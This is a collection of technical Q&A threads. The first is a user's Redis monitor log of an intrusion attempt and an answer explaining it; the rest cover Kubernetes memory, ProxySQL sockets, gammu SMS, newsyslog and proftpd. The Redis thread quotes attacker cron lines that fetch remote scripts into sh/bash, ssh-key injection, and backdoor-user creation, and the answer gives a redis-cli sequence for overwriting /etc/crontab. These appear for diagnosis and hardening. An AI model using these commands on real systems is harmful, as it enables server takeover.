attempt to hack host machine via redis open port - bash

I have Redis listening on an open port on my development machine, and recently someone has been trying to get access to the host machine through it. I have a console with Redis monitoring running, and these are the commands they used to try to get access. I have included the datetime for some of the commands as well.
GMT: Monday, August 21, 2017 4:47:53.384 AM [0 74.82.47.3:46986] "INFO"
[0 94.74.81.202:55564] "COMMAND"
[0 94.74.81.202:55564] "flushall"
[0 94.74.81.202:55606] "COMMAND"
GMT: Monday, August 21, 2017 9:21:43.586 AM [0 94.74.81.202:55606] "set" "crackit" "\n\n\nssh-rsa .....<ssh_key>.... redis#redis.io\n\n\n\n"
[0 94.74.81.202:55646] "COMMAND"
[0 185.163.109.66:40470] "INFO"
[0 185.163.109.66:40470] "SCAN" "9000"
[0 74.82.47.5:39660] "INFO"
[0 98.142.140.13:51586] "INFO"
[0 98.142.140.13:51586] "SET" "sxyxgboqet" "\n\n*/1 * * * * /usr/bin/curl -fsSL http://98.142.140.13:8220/test11.sh | sh\n\n"
[0 52.14.111.241:58464] "SET" "lololili" "\n\n*/1\t*\t*\t*\t*\troot\tcurl http://112.74.29.139:8898/1.sh|bash\n\n"
[0 106.2.120.103:41329] "INFO"
GMT: Tuesday, August 22, 2017 9:56:04.350 PM [0 178.62.175.211:58716] "eval" "local asnum ... see link below "
... the full lua script ...
[0 184.105.247.252:33152] "INFO"
GMT: Wednesday, August 23, 2017 7:18:35.995 AM [0 52.14.111.241:49208] "SET" "lololili" "\n\n*/1\t*\t*\t*\t*\troot\t(useradd -G root axis2;(echo 'asdf1234' | passwd --stdin axis2) || (echo 'axis2:asdf1234' |chpasswd));crontab -r;:>/etc/crontab;\n\n"
GMT: Wednesday, August 23, 2017 6:04:36.397 PM [0 98.142.140.13:43540] "INFO"
GMT: Thursday, August 24, 2017 5:22:26.931 AM [0 216.218.206.68:19396] "INFO"
These lines are from my redis.log file:
22 Aug 09:59:29.865 AM * RDB: 6 MB of memory used by copy-on-write
22 Aug 09:59:29.951 AM * Background saving terminated with success
22 Aug 09:59:30.137 AM # Failed opening the RDB file crontab (in server root dir /etc) for saving: Permission denied
23 Aug 07:18:36.049 AM * 1 changes in 900 seconds. Saving...
23 Aug 07:18:36.052 AM * Background saving started by pid 25388
23 Aug 07:18:36.054 AM # Failed opening the RDB file crontab (in server root dir /etc) for saving: Permission denied
23 Aug 07:18:36.153 AM # Background saving error
.............
repeated every 6 minutes
Can anybody explain what exactly the Lua script is doing? According to the Redis log, I guess it tried to eval the bash command held in the "lololili" key.
Thank you in advance.

Hi, it's an attempt to hack your machine. You should not expose your Redis instance to the internet without proper firewalling.
Judging by what I've seen, I guess this one is trying to exit the Lua sandbox.
There are multiple ways to hack your machine if you have an open Redis server:
by exiting the Lua sandbox (tried successfully on a Redis 2.8.4 with the attached gist, slightly modified)
by uploading bad scripts in an attempt to get them executed by you or your software by mistake (using the db
some references on lua sandbox exit
http://benmmurphy.github.io/blog/2015/06/04/redis-eval-lua-sandbox-escape/
https://gist.github.com/firsov/4393cc162ff87e00324a6a53a353bda2
and redis file upload
https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html
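For context, the "file upload" vector is what your own log shows: the attacker stores a payload in a key, then points Redis' RDB dump at a system file. A rough sketch of the attacker's side, assuming an unauthenticated Redis reachable on 6379 (this matches the "Failed opening the RDB file crontab (in server root dir /etc)" lines in your redis.log; <victim-ip> and <attacker-url> are placeholders):
redis-cli -h <victim-ip> flushall
redis-cli -h <victim-ip> set lololili "cron line that downloads and runs <attacker-url>/1.sh"
redis-cli -h <victim-ip> config set dir /etc
redis-cli -h <victim-ip> config set dbfilename crontab
redis-cli -h <victim-ip> save     # tries to dump the DB over /etc/crontab; your log shows this failing with "Permission denied"
The same trick aimed at ~/.ssh/authorized_keys is what the "crackit" key with the ssh-rsa blob was for.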
You should check every file belonging to redis on your host:
find / -user redis
If you find nothing, good for you, but secure your server anyway.
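A minimal hardening sketch, assuming a reasonably recent Redis and an iptables-based firewall (adjust to your distribution; protected-mode only exists from Redis 3.2 on):
# in redis.conf: listen on loopback only and require a password
bind 127.0.0.1
protected-mode yes
requirepass <long-random-password>
rename-command CONFIG ""
# at the firewall: drop external traffic to the Redis port
iptables -A INPUT -p tcp --dport 6379 ! -s 127.0.0.1 -j DROP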

Related

Memory builds up over time on Kubernetes pod, causing JVM to be unable to start

We are running a kubernetes environment and we have a pod that is encountering memory issues. The pod runs only a single container, and this container is responsible for running various utility jobs throughout the day.
The issue is that this pod's memory usage grows slowly over time. There is a 6 GB memory limit for this pod, and eventually, the memory consumption grows very close to 6GB.
A lot of our utility jobs are written in Java, and when the JVM spins up for them, they require -Xms256m in order to start. Yet, since the pod's memory is growing over time, eventually it gets to the point where there isn't 256MB free to start the JVM, and the Linux oom-killer kills the java process. Here is what I see from dmesg when this occurs:
[Thu Feb 18 17:43:13 2021] Memory cgroup stats for /kubepods/burstable/pod4f5d9d31-71c5-11eb-a98c-023a5ae8b224/921550be41cd797d9a32ed7673fb29ea8c48dc002a4df63638520fd7df7cf3f9: cache:8KB rss:119180KB rss_huge:0KB mapped_file:0KB swap:0KB inactive_anon:0KB active_anon:119132KB inactive_file:8KB active_file:0KB unevictable:4KB
[Thu Feb 18 17:43:13 2021] [ pid ] uid tgid total_vm rss nr_ptes swapents oom_score_adj name
[Thu Feb 18 17:43:13 2021] [ 5579] 0 5579 253 1 4 0 -998 pause
[Thu Feb 18 17:43:13 2021] [ 5737] 0 5737 3815 439 12 0 907 entrypoint.sh
[Thu Feb 18 17:43:13 2021] [13411] 0 13411 1952 155 9 0 907 tail
[Thu Feb 18 17:43:13 2021] [28363] 0 28363 3814 431 13 0 907 dataextract.sh
[Thu Feb 18 17:43:14 2021] [28401] 0 28401 768177 32228 152 0 907 java
[Thu Feb 18 17:43:14 2021] Memory cgroup out of memory: Kill process 28471 (Finalizer threa) score 928 or sacrifice child
[Thu Feb 18 17:43:14 2021] Killed process 28401 (java), UID 0, total-vm:3072708kB, anon-rss:116856kB, file-rss:12056kB, shmem-rss:0kB
Based on research I've been doing, here for example, it seems like it is normal on Linux to grow in memory consumption over time as various caches grow. From what I understand, cached memory should also be freed when new processes (such as my java process) begin to run.
My main question is: should this pod's memory be getting freed in order for these java processes to run? If so, are there any steps I can take to begin to debug why this may not be happening correctly?
Aside from this concern, I've also been trying to track down what is responsible for the growing memory in the first place. I was able to narrow it down to a certain job that runs every 15 minutes. I noticed that after every run, used memory for the pod grew by ~0.1 GB.
I was able to figure this out by running this command (inside the container) before and after each execution of the job:
cat /sys/fs/cgroup/memory/memory.usage_in_bytes | numfmt --to si
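For reference, the same cgroup also exposes a breakdown of that number, which shows whether the growth is reclaimable page cache or anonymous RSS (this assumes cgroup v1, which the path above suggests):
# total charged memory, the number the limit is enforced against
cat /sys/fs/cgroup/memory/memory.usage_in_bytes | numfmt --to si
# breakdown: "cache" is page cache (normally reclaimable), "rss" is anonymous memory
grep -E '^(cache|rss|rss_huge|mapped_file) ' /sys/fs/cgroup/memory/memory.stat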
From there I narrowed down the piece of bash code from which the memory seems to consistently grow. That code looks like this:
while [ "z${_STATUS}" != "z0" ]
do
RES=`$CURL -X GET "${TS_URL}/wcs/resources/admin/index/dataImport/status?jobStatusId=${JOB_ID}"`
_STATUS=`echo $RES | jq -r '.status.status' || exit 1`
PROGRES=`echo $RES | jq -r '.status.progress' || exit 1`
[ "x$_STATUS" == "x1" ] && exit 1
[ "x$_STATUS" == "x3" ] && exit 3
[ $CNT -gt 10 ] && PrintLog "WC Job ($JOB_ID) Progress: $PROGRES Status: $_STATUS " && CNT=0
sleep 10
((CNT++))
done
[ "z${_STATUS}" == "z0" ] && STATUS=Success || STATUS=Failed
This piece of code seems innocuous to me at first glance, so I do not know where to go from here.
I would really appreciate any help; I've been trying to get to the bottom of this issue for days now.
I did eventually get to the bottom of this so I figured I'd post my solution here. I mentioned in my original post that I narrowed down my issue to the while loop that I posted above in my question. Each time the job in question ran, that while loop would iterate maybe 10 times. After the while loop completed, I noticed that utilized memory increased by 100MB each time pretty consistently.
On a hunch, I had a feeling the CURL command within the loop could be the culprit. And in fact, it did turn out that CURL was eating up my memory and not releasing it for whatever reason. Instead of looping and running the following CURL command:
RES=`$CURL -X GET "${TS_URL}/wcs/resources/admin/index/dataImport/status?jobStatusId=${JOB_ID}"`
I replaced this command with a simple python script that utilized the requests module to check our job statuses instead.
I am still not sure why curl was the culprit in this case. After running curl --version it appears that the underlying library being used is libcurl/7.29.0. Maybe there is a bug within that library version causing issues with memory management, but that is just a guess.
In any case, switching from curl to Python's requests module has resolved my issue.

Connecting to ProxySQL via socket - "No such file or directory"

I am trying to connect to ProxySQL from PHP with mysqlnd using the local socket, but I get "No such file or directory", as if the socket did not exist. The same code can connect to the MySQL socket with no problem.
Basically I am reproducing what was described at:
https://www.percona.com/blog/2017/09/19/proxysql-improves-mysql-ssl-connections/
<?php
$i = 10000;
$user = 'percona';
$pass = 'percona';
while ($i >= 0) {
    $mysqli = mysqli_init();
    // ProxySQL
    $link = mysqli_real_connect($mysqli, "localhost", $user, $pass, "", 6033, "/tmp/proxysql.sock")
        or die(mysqli_connect_error());
    $info = mysqli_get_host_info($mysqli);
    $i--;
    mysqli_close($mysqli);
    unset($mysqli);
}
?>
This throws:
mysqli_real_connect(): (HY000/2002): No such file or directory
The socket file (/tmp/proxysql.sock) is in fact there:
$ ls -all /tmp
total 12
drwxrwxrwt. 11 root root 4096 Oct 7 17:33 .
dr-xr-xr-x. 28 root root 4096 Sep 20 17:42 ..
drwxrwxrwt. 2 root root 6 Aug 8 02:40 .font-unix
drwxrwxrwt. 2 root root 6 Aug 8 02:40 .ICE-unix
srwxrwxrwx 1 proxysql proxysql 0 Oct 7 17:11 proxysql.sock
I can use the mysql client to connect through it:
$ mysql -u myuser -p --socket /tmp/proxysql.sock --prompt='ProxySQLClient> '
If in the above PHP code I replace the socket file with the MySQL socket, then that works. It is only the proxysql.sock which doesn't work with mysqlnd.
I am using:
mysqlnd version mysqlnd 5.0.12-dev - 20150407
ProxySQL version 2.0.6
Any idea why the proxysql.sock is not accepted by mysqlnd?
UPDATE: Following @EternalHour's suggestion below, I have also tried moving the proxysql.sock file out of /tmp, but unfortunately that didn't make a difference. I am still receiving the same error.
EDIT (2019-10-08): It turns out this issue has nothing to do with PHP, as netcat hits the same problem too, whether the socket file is in /tmp or in /var/sockets/:
$ nc -U /tmp/proxysql.sock
Ncat: No such file or directory.
Out of the 3 nodes of the ProxySQL cluster, all running the same OS and kernel version, 1 has this issue while the other 2 allow connections to the socket file at /tmp/proxysql.sock. Although on those nodes too, restarting ProxySQL sometimes results in the socket file being created as private (i.e. not available to other applications).
Many MySQL clients have special handling of the word localhost: localhost doesn't mean "use the resolver to resolve localhost and connect via TCP" but "use the unix domain socket on the default path". To force TCP, use 127.0.0.1 instead. If ProxySQL also provides a unix domain socket, provide that path.
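You can see the same distinction with the command-line client; which of these two works tells you whether it is the socket path or TCP that is broken (6033 and /tmp/proxysql.sock taken from the question):
mysql -u percona -p -h localhost --socket=/tmp/proxysql.sock    # "localhost" means unix socket; --socket picks the path
mysql -u percona -p -h 127.0.0.1 -P 6033                        # 127.0.0.1 forces a TCP connection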
I am sorry everyone, the issue was embarrassingly simple: it was simply my fault.
When I was changing the socket file's location in ProxySQL Admin I was using the following:
update global_variables set variable_value='0.0.0.0:6033;/tmp/proxysql.sock ' where variable_name='mysql-interfaces';
SAVE MYSQL VARIABLES TO DISK;
Yes, that is a space at the end of "/tmp/proxysql.sock ".
When I was changing it to different locations, I only ever rewrote the first half of the value (the folder), never the filename, so I just kept copying the space along and hence always got "file or directory not found"...
Problem solved!
Sorry about that.
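For anyone who hits the same thing, the corrected sequence looks roughly like this (the admin port and credentials below are ProxySQL defaults and an assumption on my side; note there is no trailing space in the value):
mysql -h 127.0.0.1 -P 6032 -u admin -padmin -e "
UPDATE global_variables SET variable_value='0.0.0.0:6033;/tmp/proxysql.sock' WHERE variable_name='mysql-interfaces';
SAVE MYSQL VARIABLES TO DISK;"
# as far as I know mysql-interfaces is only picked up at startup, so restart ProxySQL afterwards
systemctl restart proxysql    # service name may differ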

Gammu stops receiving SMS after a while

I have a problem that's been bugging me for a while now. I've been searching for solutions for 2 weeks without any result. These guys have the same problem as me, but there are no answers there.
I'm running gammu (1.31) and gammu-smsd on a Raspberry Pi with Raspbian, using a Huawei E367.
I don't know why I get 3 devices: /dev/ttyUSB0, /dev/ttyUSB1, /dev/ttyUSB2.
Since I don't know the difference between them, I tried different settings and got it running with the following: ttyUSB0 in the gammu config and ttyUSB2 in gammu-smsdrc. Both as root and as a normal user.
Sending SMS works great. Then comes the problem: receiving SMS works for a while, then just stops. If I reboot the system it starts working again for a while, but then the same thing happens.
# Configuration file for Gammu SMS Daemon
# Gammu library configuration, see gammurc(5)
[gammu]
# Please configure this!
port = /dev/ttyUSB2
connection = at
# Debugging
#logformat = textall
# SMSD configuration, see gammu-smsdrc(5)
[smsd]
service = files
logfile = /home/pi/gammu/log/log_smsdrc.txt
# Increase for debugging information
debuglevel = 0
# Paths where messages are stored
inboxpath = /home/pi/gammu/inbox/
outboxpath = /home/pi/gammu/outbox/
sentsmspath = /home/pi/gammu/sent/
errorsmspath = /home/pi/gammu/error/
ReceiveFrequency = 2
LoopSleep = 1
GammuCoding = utf8
CommTimeout = 0
#RunOnReceive =
Log
Tue 2015/03/31 11:05:19 gammu-smsd[7379]: Starting phone communication...
Tue 2015/03/31 11:07:07 gammu-smsd[7379]: Terminating communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2091]: Warning: No PIN code in /etc/gammu-smsdrc file
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Created POSIX RW shared memory at 0xb6f6d000
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Error at init connection: Error opening device, it doesn't exist. (DEVICENOTEXIST[4])
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Error at init connection: Error opening device, it doesn't exist. (DEVICENOTEXIST[4])
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Error at init connection: Error opening device, it doesn't exist. (DEVICENOTEXIST[4])
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Error at init connection: Error opening device, it doesn't exist. (DEVICENOTEXIST[4])
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Going to 30 seconds sleep because of too much connection errors
Tue 2015/03/31 11:08:14 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:08:21 gammu-smsd[2116]: Soft reset return code: Function not supported by phone. (NOTSUPPORTED[21])
Tue 2015/03/31 11:08:27 gammu-smsd[2116]: Read 2 messages
Tue 2015/03/31 11:08:27 gammu-smsd[2116]: Received IN20150331_110600_00_+xxxxxx_00.txt
Tue 2015/03/31 11:08:27 gammu-smsd[2116]: Received IN20150331_110820_00_+xxxxxx_00.txt
Tue 2015/03/31 11:09:38 gammu-smsd[2116]: Read 1 messages
Tue 2015/03/31 11:09:38 gammu-smsd[2116]: Received IN20150331_110934_00_+xxxxxx_00.txt
Tue 2015/03/31 11:13:57 gammu-smsd[2116]: Read 1 messages
Tue 2015/03/31 11:13:57 gammu-smsd[2116]: Received IN20150331_111352_00_+xxxxxx_00.txt
I guess the early warnings are before my modeswitch command kicks in.
in rc.local:
sudo usb_modeswitch -v 0x12d1 -p 0x1446 -V 0x12d1 -P 0x1506 -m 0x01 -M 55534243123456780000000000000011062000000100000000000000000000 -I
I had the same problem, so I wrote a shell script that quickly reactivates the missing /dev/ttyUSB[0-2] devices, and added it as a cron job:
*/5 * * * * /home/sysadmin/scripts/reanimate-usb-stick.sh >/dev/null 2>&1
reanimate-usb-stick.sh
#!/bin/bash
export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"

# Count how many /dev/ttyUSB* devices are currently present
USBDEVICES=$(ls -l /dev/* | awk '/\/dev\/ttyUSB[0-7]/ {print $6}' | wc -l)
DEVICEINFO=""
DEVICEPORT=""

if [ $USBDEVICES = 0 ]
then
    # No serial devices left: look up the Huawei stick's vendor and product IDs from lsusb
    datas=$(lsusb | grep -i hua | awk '/Bus/ {print $6}' | tr ":" "\n")
    counter=0
    for line in $datas
    do
        counter=$((counter+1))
        if [ $counter = 1 ]
        then
            DEVICEINFO="$line"    # vendor ID
        fi
        if [ $counter = 2 ]
        then
            DEVICEPORT="$line"    # product ID
        fi
    done
    # Ask the stick to switch back into modem mode
    usb_modeswitch -v $DEVICEINFO -p $DEVICEPORT -J
    echo "$DEVICEINFO - $DEVICEPORT"
else
    echo "ALLES OK : $USBDEVICES"
    exit
fi
This looks pretty much the same as https://github.com/gammu/gammu/issues/4, and even though there were some attempts to fix this in Gammu, it seems that the Huawei modem firmware is simply not stable enough for this usage. Simply asking it several times to list received messages makes it unresponsive.
Also, which device node you use might make a slight difference; see the Gammu manual and the dd-wrt wiki for more information on that topic.
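To take the guesswork out of which of the three ttyUSB nodes is the AT port, you can let gammu probe them itself; a quick sketch (gammu-detect ships with newer gammu releases, so it may or may not be present in 1.31):
gammu-detect                          # prints a [gammu] section with the port it found
gammu -c /path/to/gammurc identify    # verify that the chosen port answers AT commands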
I had a similar problem with a Huawei 3G modem (E1750). I added the following lines to the /etc/gammu-smsdrc file:
ReceiveFrequency = 60
StatusFrequency = 60
CommTimeout = 60
SendTimeout = 60
LoopSleep = 10
CheckSecurity = 0
The idea is to minimize the amount of communication between gammu-smsd and the 3G modem. In particular, the default LoopSleep=1 means that gammu sends commands to the modem every second, which can be too much for the modem firmware, so I used 10.
The next thing is something standard in all Raspberry Pi/ARM embedded projects: use a powerful power supply. I'm using a charger with a fixed cable (I believe some detachable cables can be inappropriate for currents above 2A) that looks like this:
http://botland.com.pl/9240-thickbox_default/zasilacz-extreme-microusb-5v-21a-raspberry-pi.jpg
With that, the modem still hangs after about 50-100 hours of operation, but that's enough for my project.

Use newsyslog to rotate log files, but only if they have a certain size

I'm on OS X 10.9.4 and trying to use newsyslog to rotate my app development log files.
More specifically, I want to rotate the files daily but only if they are not empty (newsyslog writes one or two lines to every logfile it rotates, so let's say I only want to rotate logs that are at least 1kb).
I created a file /etc/newsyslog.d/code.conf:
# logfilename [owner:group] mode count size when flags [/pid_file] [sig_num]
/Users/manuel/code/**/log/*.log manuel:staff 644 7 1 $D0 GN
The way I understand the man page for the configuration file, the size and when conditions should work in combination, so logfiles should be rotated every night at midnight only if they are 1kb or larger.
Unfortunately this is not what happens. The log files are rotated every night, no matter whether they contain only the rotation message from newsyslog or anything else:
~/code/myapp/log (master) $ ls
total 32
drwxr-xr-x 6 manuel staff 204B Aug 8 00:17 .
drwxr-xr-x 22 manuel staff 748B Jul 25 14:56 ..
-rw-r--r-- 1 manuel staff 64B Aug 8 00:17 development.log
-rw-r--r-- 1 manuel staff 153B Aug 8 00:17 development.log.0
~/code/myapp/log (master) $ cat development.log
Aug 8 00:17:41 localhost newsyslog[81858]: logfile turned over
~/code/myapp/log (master) $ cat development.log.0
Aug 7 00:45:17 Manuels-MacBook-Pro newsyslog[34434]: logfile turned over due to size>1K
Aug 8 00:17:41 localhost newsyslog[81858]: logfile turned over
Any tips on how to get this working would be appreciated!
What you're looking for (rotate files daily unless they haven't logged anything) isn't possible using newsyslog. The man page you referenced doesn't say anything about size and when being combined, other than to say that if when isn't specified, then it is as if only size was specified. The reality is that the log is rotated when either condition is met. If the utility is like its FreeBSD counterpart, it won't rotate logs smaller than 512 bytes unless the binary flag is set.
macOS's newer replacement for newsyslog, ASL, also doesn't have the behavior you want. As far as I know, the only utility which has this is logrotate, using its notifempty configuration option. You can install logrotate on your Mac using Homebrew.
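A sketch of what that could look like with logrotate from Homebrew (the paths below are assumptions, and logrotate's globbing is plainer than newsyslog's ** pattern, so each project tree may need its own entry):
brew install logrotate

# contents of ~/.config/logrotate.conf (sketch):
/Users/manuel/code/*/log/*.log {
    daily
    rotate 7
    notifempty
    missingok
}

# run it periodically, e.g. from cron or launchd:
logrotate --state ~/.logrotate.state ~/.config/logrotate.conf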

error: unable to open /dev/null for stdin: No such file or directory

I cannot get a simple trigger on proftpd working. Here is what I did:
<IfModule mod_exec.c>
ExecEngine on
ExecOptions logStderr logStdout
ExecLog /var/log/proftpd/exec.log
ExecOnCommand APPE,STOR /usr/local/bin/proftptest.sh %u %f
</IfModule>
however it keeps on failing with:
Jan 21 17:31:07 mod_exec/0.9.9[22514]: already saw this Exec, skipping
Jan 21 17:31:07 mod_exec/0.9.9[22514]: already saw this Exec, skipping
Jan 21 17:31:07 mod_exec/0.9.9[22514]: preparing to execute '/usr/local/bin/proftptest.sh' with uid 117 (euid 117), gid 65534 (egid 65534)
Jan 21 17:31:07 mod_exec/0.9.9[22514]: + '/usr/local/bin/proftptest.sh': argv[1] = ftp
Jan 21 17:31:07 mod_exec/0.9.9[22514]: + '/usr/local/bin/proftptest.sh': argv[2] = /home/ftp/incoming/Examples.txt
Jan 21 17:31:07 mod_exec/0.9.9[22514]: error: unable to open /dev/null for stdin: No such file or directory
Jan 21 17:31:07 mod_exec/0.9.9[22514]: STOR ExecOnCommand '/usr/local/bin/proftptest.sh' failed: No such file or directory
Jan 21 17:31:07 mod_exec/0.9.9[22514]: already saw this Exec, skipping
Jan 21 17:31:07 mod_exec/0.9.9[22514]: already saw this Exec, skipping
However the script seems fine (running from my user session, default env):
$ ls -al /usr/local/bin/proftptest.sh
-rwxr-xr-x 1 root root 97 Jan 21 17:25 /usr/local/bin/proftptest.sh
I am NOT using DefaultRoot:
$ grep Default /etc/proftpd/proftpd.conf
DefaultServer on
# DefaultRoot ~
What could I possibly be missing?
As explained in the documentation:
http://www.castaglia.org/proftpd/modules/mod_exec.html#Usage
This module will not work properly for <Anonymous> logins.
This documents the symptom, but does not solve the real issue, so I'm moving on to a different FTP server...
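For anyone who wants to stay on proftpd: the "unable to open /dev/null" error is typical of a session chrooted (as <Anonymous> logins are) into a directory tree that has no /dev/null. A commonly suggested workaround, untested against this exact setup and assuming the anonymous root is /home/ftp, is to create the device node inside the chroot:
mkdir -p /home/ftp/dev
mknod -m 0666 /home/ftp/dev/null c 1 3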
